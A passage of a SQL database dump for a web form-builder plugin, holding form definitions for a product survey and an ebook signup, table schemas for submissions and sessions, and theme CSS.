Service:</b>*:*w_field_label*:*150*:*w_field_label_size*:*left*:*w_field_label_pos*:*ver*:*w_flow*:*Excellent***Good***Average***Dissatisfied*:*w_choices*:*false***false***false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:**:*w_class*:**:*new_field*:*6*:*id*:*type_textarea*:*type*:*<b>Any comments, questions or suggestions?</b>*:*w_field_label*:*300*:*w_field_label_size*:*top*:*w_field_label_pos*:*300*:*w_size_w*:*100*:*w_size_h*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*7*:*id*:*type_submit_reset*:*type*:*type_submit_reset_7*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*false*:*w_act*:**:*new_field*:*', 1, 1, '*', '', '', '', '', 1, '', '', '', '', '', '', '', '', '', '', '', 1, 1, 1, 1),
(9, 'Product Survey', '', '<div class="wdform-page-and-images" style="display:table; border-top:0px solid black;"><div id="form_id_tempform_view1" class="wdform_page" page_title="Untitled page" next_title="Next" next_type="text" next_class="wdform-page-button" next_checkable="false" previous_title="Previous" previous_type="text" previous_class="wdform-page-button" previous_checkable="false"><div class="wdform_section"><div class="wdform_column"></div></div><div wdid="1" type="type_section_break" class="wdform_tr_section_break">%1 - custom_1%</div><div class="wdform_section"><div class="wdform_column"><div wdid="2" class="wdform_row">%2 - 1. Please indicate if you agree or disagree with the following statements%</div><div wdid="3" class="wdform_row">%3 - 2. How likely are you to recommend [Product/Service] to a friend or co-worker?%</div><div wdid="4" class="wdform_row">%4 - 3. What is the amount you would ever pay for a product like ours%</div><div wdid="5" class="wdform_row">%5 - 4. Please rate the product %</div><div wdid="6" class="wdform_row">%6 - type_submit_reset_6%</div></div></div><div valign="top" class="wdform_footer" style="width: 100%;"><div style="width: 100%;"><div style="width: 100%; display: table;"><div style="display: table-row-group;"><div id="form_id_temppage_nav1" style="display: table-row;"></div></div></div></div></div></div></div>', 29, '// Occurs before the form is loaded\r\nfunction before_load()\r\n{\r\n\r\n}\r\n\r\n// Occurs just before submitting  the form\r\nfunction before_submit()\r\n{\r\n\r\n}\r\n\r\n// Occurs just before resetting the form\r\nfunction before_reset()\r\n{\r\n\r\n}', '', '', 0, '%all%', '%all%', 7, 1, '2#**id**#1. Please indicate if you agree or disagree with the following statements#**label**#type_matrix#****#3#**id**#2. How likely are you to recommend [Product/Service] to a friend or co-worker?#**label**#type_scale_rating#****#4#**id**#3. What is the amount you would ever pay for a product like ours#**label**#type_range#****#5#**id**#4. Please rate the product #**label**#type_star_rating#****#6#**id**#type_submit_reset_6#**label**#type_submit_reset#****#', '2#**id**#1. Please indicate if you agree or disagree with the following statements#**label**#type_matrix#****#3#**id**#2. How likely are you to recommend [Product/Service] to a friend or co-worker?#**label**#type_scale_rating#****#4#**id**#3. What is the amount you would ever pay for a product like ours#**label**#type_range#****#5#**id**#4. Please rate the product #**label**#type_star_rating#****#6#**id**#type_submit_reset_6#**label**#type_submit_reset#****#', '0', 'none', 'false', 'true', '', '', '', 0, '', '', 'USD', 0, '1*:*id*:*type_section_break*:*type*:*custom_1*:*w_field_label*:*<h1 class="sg-title" data-mce-style="font-size: 2.2em; color: #fff; font-weight: normal; line-height: normal;" style="font-size: 2.2em; font-weight: normal; color: rgb(255, 255, 255); line-height: normal;">Product Survey</h1>*:*w_editor*:**:*new_field*:*2*:*id*:*type_matrix*:*type*:*1. Please indicate if you agree or disagree with the following statements*:*w_field_label*:*600*:*w_field_label_size*:*top*:*w_field_label_pos*:*radio*:*w_field_input_type*:****Product is affordable***Product is valuable***Product is better<br> than other products on<br> the market***Product is easy to use*:*w_rows*:****Strongly Disagree***Disagree***Neutral***Agree***Strongly Agree*:*w_columns*:*no*:*w_required*:*wdform_matrix*:*w_class*:**:*new_field*:*3*:*id*:*type_scale_rating*:*type*:*2. How likely are you to recommend [Product/Service] to a friend or co-worker?*:*w_field_label*:*600*:*w_field_label_size*:*top*:*w_field_label_pos*:*Will not recommend  ***  I will recommend*:*w_mini_labels*:*5*:*w_scale_amount*:*no*:*w_required*:*wdform_scale_rating*:*w_class*:**:*new_field*:*4*:*id*:*type_range*:*type*:*3. What is the amount you would ever pay for a product like ours*:*w_field_label*:*600*:*w_field_label_size*:*top*:*w_field_label_pos*:*40*:*w_field_range_width*:*1*:*w_field_range_step*:*null*:*w_field_value1*:*null*:*w_field_value2*:*From***To*:*w_mini_labels*:*no*:*w_required*:**:*w_class*:**:*new_field*:*5*:*id*:*type_star_rating*:*type*:*4. Please rate the product *:*w_field_label*:*150*:*w_field_label_size*:*top*:*w_field_label_pos*:*yellow*:*w_field_label_col*:*10*:*w_star_amount*:*no*:*w_required*:*wdform_star_rating*:*w_class*:**:*new_field*:*6*:*id*:*type_submit_reset*:*type*:*type_submit_reset_6*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*true*:*w_act*:**:*new_field*:*', 1, 1, '*', '', '', '', '', 1, '', '', '', '', '', '', '', '', '', '', '', 1, 1, 1, 1),
(10, 'Free Ebook', '', '<div class="wdform-page-and-images" style="display:table; border-top:0px solid black;"><div id="form_id_tempform_view1" class="wdform_page" page_title="Untitled page" next_title="Next" next_type="text" next_class="wdform-page-button" next_checkable="false" previous_title="Previous" previous_type="text" previous_class="wdform-page-button" previous_checkable="false"><div class="wdform_section"><div class="wdform_column"><div wdid="1" class="wdform_row">%1 - Name%</div><div wdid="2" class="wdform_row">%2 - Email%</div><div wdid="3" class="wdform_row">%3 - type_submit_reset_3%</div></div></div><div valign="top" class="wdform_footer" style="width: 100%;"><div style="width: 100%;"><div style="width: 100%; display: table;"><div style="display: table-row-group;"><div id="form_id_temppage_nav1" style="display: table-row;"></div></div></div></div></div></div></div>', 1, '// before form is load\r\nfunction before_load() {	\r\n}	\r\n// before form submit\r\nfunction before_submit() {\r\n}	\r\n// before form reset\r\nfunction before_reset() {	\r\n}', '', '', 0, '%all%', '%all%', 8, 1, '1#**id**#Name#**label**#type_text#****#2#**id**#Email#**label**#type_text#****#3#**id**#type_submit_reset_3#**label**#type_submit_reset#****##**id**##**label**##****#', '1#**id**#Name#**label**#type_text#****#2#**id**#Email#**label**#type_text#****#3#**id**#type_submit_reset_3#**label**#type_submit_reset#****#', '0', 'none', 'false', 'true', '', '', '', 0, 'testmode', '', '', 0, '1*:*id*:*type_text*:*type*:*Name*:*w_field_label*:*50*:*w_field_label_size*:*left*:*w_field_label_pos*:*130*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_unique*:**:*new_field*:*2*:*id*:*type_text*:*type*:*Email*:*w_field_label*:*50*:*w_field_label_size*:*left*:*w_field_label_pos*:*130*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_unique*:**:*new_field*:*3*:*id*:*type_submit_reset*:*type*:*type_submit_reset_3*:*w_field_label*:* *:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*false*:*w_act*:**:*new_field*:*', 1, 1, '*', '', '', '', '', 1, '', '', '', '', '', '', '', '', '', '', '', 1, 1, 1, 1);

-- --------------------------------------------------------

--
-- Table structure for table `cyb_formmaker_blocked`
--

CREATE TABLE IF NOT EXISTS `cyb_formmaker_blocked` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `ip` varchar(128) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;

-- --------------------------------------------------------

--
-- Table structure for table `cyb_formmaker_query`
--

CREATE TABLE IF NOT EXISTS `cyb_formmaker_query` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `form_id` int(11) NOT NULL,
  `query` text NOT NULL,
  `details` text NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;

-- --------------------------------------------------------

--
-- Table structure for table `cyb_formmaker_sessions`
--

CREATE TABLE IF NOT EXISTS `cyb_formmaker_sessions` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `form_id` int(20) NOT NULL,
  `group_id` int(20) NOT NULL,
  `ip` varchar(20) NOT NULL,
  `ord_date` datetime NOT NULL,
  `ord_last_modified` datetime NOT NULL,
  `status` varchar(50) NOT NULL,
  `full_name` varchar(100) NOT NULL,
  `email` varchar(50) NOT NULL,
  `phone` varchar(50) NOT NULL,
  `mobile_phone` varchar(255) NOT NULL,
  `fax` varchar(255) NOT NULL,
  `address` varchar(300) NOT NULL,
  `paypal_info` text NOT NULL,
  `without_paypal_info` text NOT NULL,
  `ipn` varchar(20) NOT NULL,
  `checkout_method` varchar(20) NOT NULL,
  `tax` float NOT NULL,
  `shipping` float NOT NULL,
  `shipping_type` varchar(200) NOT NULL,
  `read` int(11) NOT NULL,
  `total` float NOT NULL,
  `currency` varchar(24) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;

-- --------------------------------------------------------

--
-- Table structure for table `cyb_formmaker_submits`
--

CREATE TABLE IF NOT EXISTS `cyb_formmaker_submits` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `form_id` int(11) NOT NULL,
  `element_label` varchar(128) NOT NULL,
  `element_value` varchar(600) NOT NULL,
  `group_id` int(11) NOT NULL,
  `date` datetime NOT NULL,
  `ip` varchar(32) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;

-- --------------------------------------------------------

--
-- Table structure for table `cyb_formmaker_themes`
--

CREATE TABLE IF NOT EXISTS `cyb_formmaker_themes` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `title` varchar(200) NOT NULL,
  `css` text NOT NULL,
  `default` tinyint(4) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 AUTO_INCREMENT=38 ;

--
-- Dumping data for table `cyb_formmaker_themes`
--

INSERT INTO `cyb_formmaker_themes` (`id`, `title`, `css`, `default`) VALUES
(1, 'Theme 01 blue', '.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #013D7C;\r\nborder-radius: 5px;\r\ncolor: #013D7C;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\ninput[type="radio"]\r\n{\r\nborder:none !important;\r\noutline:none !important;\r\n}\r\ninput[type="checkbox"]\r\n{\r\nborder:none !important;\r\noutline:none !important;\r\n}\r\na.ui-spinner-button\r\n{\r\nborder-radius:0px !important;\r\nbackground: none!important;\r\n}\r\n\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\n\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #000;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #8A8A8A !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px solid #000 !important;\r\npadding-left:10px;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n\r\n.sel-imul {\r\n	display: none;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 0px solid #D3D3D3;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/09/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/10/01/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\ncolor: #FFF;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 38px;\r\nline-height: 35px;\r\nbackground:url([SITE_ROOT]/images/10/next.png) no-repeat right #013D7C;\r\npadding: 0px 36px 0 20px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder-top-right-radius: 7px;\r\nborder-bottom-right-radius: 7px;\r\n}\r\n.previous-page div.wdform-page-button {\r\ncolor: #A2A2A2;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 37px;\r\nline-height: 35px;\r\nbackground:url([SITE_ROOT]/images/09/previous.png) no-repeat left #F1F1F1;\r\npadding: 0 20px 0 36px;\r\nvertical-align: middle;\r\nfont-size: 18px;\r\nborder-top-left-radius: 7px;\r\nborder-bottom-left-radius: 7px;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #013D7C;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: #FFFFFF;\r\n	padding-top: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #013D7C;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 10px 40px 0px;\r\n}\r\n\r\n.wdform_section_break {\r\n	color: #013D7C;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	padding: 2px;\r\n	height: 26px;\r\n	border: 1px solid #B7B7B7;\r\nbackground: #F8F8F8;\r\n}\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F8F8F8;\r\nborder:1px solid #B7B7B7;\r\n}\r\ninput[type="text"]:focus{\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\nselect {\r\n	outline: none;\r\n}\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n\r\n\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n\r\n\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #8A8A8A;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #013E7D;\r\nbackground-color: #FFF;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 29px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 16px;\r\nfont-weight:bold;\r\n}\r\n.page_active {\r\ncolor: #FFF;\r\ncursor: pointer;\r\nbackground-color: #013E7D;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 20px;\r\npadding: 5px 25px 0px 25px;\r\nline-height: 26px;\r\nfont-weight:bold;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nmargin: 0px;\r\nborder-spacing: 0px;\r\nheight: 16px;\r\nline-height: 16px;\r\nfont-size: 15px;\r\nfloat: left;\r\ntext-align: right !important;\r\nz-index: 1;\r\nposition: relative;\r\nvertical-align: middle;\r\nbackground: #013E7F;\r\ncolor: #fff;\r\nborder-top-left-radius: 5px;\r\nborder-bottom-left-radius: 5px;\r\n}\r\n.page_percentage_deactive {\r\nheight: 16px;\r\nline-height: 16px;\r\nbackground-color: #F1F1F1;\r\ntext-align: left !important;\r\nmargin-bottom: 1px;\r\nborder-radius: 5px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n}\r\n\r\n.wdform_percentage_text {\r\nmargin: 3px 5px 3px 9px;\r\ncolor: #FFF;\r\nfont-size: 12px;\r\n}\r\n.wdform_percentage_title {\r\n	color: #6E6E6E;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 27px;\r\n	height: 27px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}', 0),
(2, 'Theme 01 purple', '.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #6C005E;\r\nborder-radius: 5px;\r\ncolor: #6C005E;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\ninput[type="radio"]\r\n{\r\nborder:none !important;\r\noutline:none !important;\r\n}\r\ninput[type="checkbox"]\r\n{\r\nborder:none !important;\r\noutline:none !important;\r\n}\r\na.ui-spinner-button\r\n{\r\nborder-radius:0px !important;\r\nbackground: none!important;\r\n}\r\n\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\n\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #000;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #8A8A8A !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px solid #000 !important;\r\npadding-left:10px;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n\r\n.sel-imul {\r\n	display: none;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 0px solid #D3D3D3;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/09/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: 